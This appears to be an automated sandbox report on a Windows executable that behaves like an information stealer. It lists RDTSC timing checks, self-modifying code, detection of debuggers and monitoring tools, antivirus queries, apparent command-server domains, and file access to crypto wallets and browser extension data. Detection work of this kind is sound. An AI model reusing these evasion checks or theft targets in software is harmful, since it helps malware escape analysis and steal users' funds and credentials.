              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CD8BB second address: 66CD8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CD8BF second address: 66CD907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Bh 0x00000007 jmp 00007F5AF5006760h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F5AF5006756h 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a jp 00007F5AF5006769h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CD907 second address: 66CD918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF4D0D7CDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D07D0 second address: 66D07D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D07D4 second address: 66D07DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D084D second address: 66D086B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5AF5006769h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D086B second address: 66D08D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F5AF4D0D7CBh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F5AF4D0D7C8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov si, bx 0x0000002b push 00000000h 0x0000002d sub cx, 3920h 0x00000032 push 244289ECh 0x00000037 pushad 0x00000038 jns 00007F5AF4D0D7DFh 0x0000003e jmp 00007F5AF4D0D7D9h 0x00000043 push eax 0x00000044 push edx 0x00000045 jbe 00007F5AF4D0D7C6h 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D08D6 second address: 66D08DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D08DA second address: 66D090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 2442896Ch 0x0000000e or esi, 57028B5Dh 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 sub dword ptr [ebp+122D1D90h], esi 0x0000001e push 00000003h 0x00000020 xor edi, dword ptr [ebp+122D37EDh] 0x00000026 push 6295D862h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jo 00007F5AF4D0D7C6h 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D090E second address: 66D0912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D0912 second address: 66D093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b add dword ptr [esp], 5D6A279Eh 0x00000012 mov dh, D5h 0x00000014 lea ebx, dword ptr [ebp+124466F7h] 0x0000001a sbb edi, 512F6FBEh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D093A second address: 66D093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D099B second address: 66D09A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F5AF4D0D7C6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D09A8 second address: 66D0A1E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5AF5006756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F5AF5006758h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 clc 0x00000029 push 00000000h 0x0000002b jmp 00007F5AF5006761h 0x00000030 call 00007F5AF5006759h 0x00000035 jmp 00007F5AF500675Eh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jnp 00007F5AF5006766h 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D0A1E second address: 66D0A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F5AF4D0D7C8h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D0A34 second address: 66D0A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D0A3A second address: 66D0A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D0A3E second address: 66D0A61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5AF5006767h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D0A61 second address: 66D0A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5AF4D0D7C6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 jns 00007F5AF4D0D7CCh 0x00000019 push eax 0x0000001a push edx 0x0000001b jno 00007F5AF4D0D7C6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D0B6C second address: 66D0BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jmp 00007F5AF5006768h 0x0000000e jmp 00007F5AF5006763h 0x00000013 popad 0x00000014 pop edi 0x00000015 nop 0x00000016 add edi, dword ptr [ebp+122D360Dh] 0x0000001c push 00000000h 0x0000001e sbb edi, 4A400A02h 0x00000024 push D430DF31h 0x00000029 pushad 0x0000002a pushad 0x0000002b jmp 00007F5AF5006760h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66D0BCA second address: 66D0C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F5AF4D0D7C8h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e add dword ptr [esp], 2BCF214Fh 0x00000015 mov ecx, ebx 0x00000017 mov dword ptr [ebp+122D1CA9h], edi 0x0000001d push 00000003h 0x0000001f mov ecx, dword ptr [ebp+122D30ABh] 0x00000025 push 00000000h 0x00000027 mov edi, edx 0x00000029 push 00000003h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F5AF4D0D7C8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov dx, di 0x00000048 push C9C7D903h 0x0000004d pushad 0x0000004e push ecx 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 pop ecx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BEBF9 second address: 66BEBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BEBFF second address: 66BEC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BEC0A second address: 66BEC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BEC0E second address: 66BEC12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BEC12 second address: 66BEC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F03B7 second address: 66F03D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5AF4D0D7CEh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F03D1 second address: 66F03DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F5AF5006758h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F0547 second address: 66F054B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F054B second address: 66F0553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F0553 second address: 66F057C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5AF4D0D7D2h 0x00000008 pushad 0x00000009 jmp 00007F5AF4D0D7D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F057C second address: 66F0582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F0F14 second address: 66F0F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F0F18 second address: 66F0F27 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AF5006756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B9BED second address: 66B9BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B9BF3 second address: 66B9BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B9BF7 second address: 66B9C05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B9C05 second address: 66B9C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B9C0B second address: 66B9C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F75A4 second address: 66F75BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F5AF5006756h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F75BF second address: 66F75C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F7699 second address: 66F76A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F76A7 second address: 66F76B1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5AF4D0D7C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F76B1 second address: 66F76BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5AF5006756h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F76BB second address: 66F76EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007F5AF4D0D7CDh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop ecx 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c jmp 00007F5AF4D0D7CEh 0x00000021 pop ecx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F76EE second address: 66F7719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5AF5006766h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F78C3 second address: 66F78C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F8AE3 second address: 66F8AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F8AE9 second address: 66F8AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C8D3A second address: 66C8D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF500675Dh 0x00000009 pop esi 0x0000000a push edi 0x0000000b jmp 00007F5AF500675Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F9F04 second address: 66F9F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F5AF4D0D7C6h 0x0000000c jmp 00007F5AF4D0D7CBh 0x00000011 jmp 00007F5AF4D0D7D9h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F5AF4D0D7C6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F9F3D second address: 66F9F5B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5AF5006756h 0x00000008 jmp 00007F5AF5006761h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B67C5 second address: 66B67C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FCD2F second address: 66FCD41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F5AF500675Ch 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FCEDA second address: 66FCEDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FCEDE second address: 66FCF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jc 00007F5AF5006768h 0x0000000e jmp 00007F5AF5006762h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FCF04 second address: 66FCF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FD362 second address: 66FD396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F5AF5006756h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F5AF5006764h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jns 00007F5AF500675Ch 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FD4F9 second address: 66FD501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FF5CB second address: 66FF5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5AF5006756h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FF5D5 second address: 66FF5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 29C8AF instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 464A27 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 44B693 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4C7340 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 655D9E3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 66F74AD instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6688Thread sleep time: -34017s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6956Thread sleep time: -32000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6952Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6640Thread sleep time: -32016s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6644Thread sleep time: -32016s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exe, 00000000.00000003.1678963568.0000000005060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
              Source: file.exe, 00000000.00000003.1678963568.0000000005060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
              Source: file.exe, 00000000.00000003.1678963568.0000000005060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
              Source: file.exe, 00000000.00000003.1678963568.0000000005060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
              Source: file.exe, 00000000.00000003.1678963568.0000000005060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.1901390981.0000000001246000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1921509189.0000000001246000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1922130720.0000000001246000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1981971533.0000000001246000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6568, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exe, 00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: file.exe, 00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: file.exe, 00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exe, 00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: file.exe, 00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: file.exe, 00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
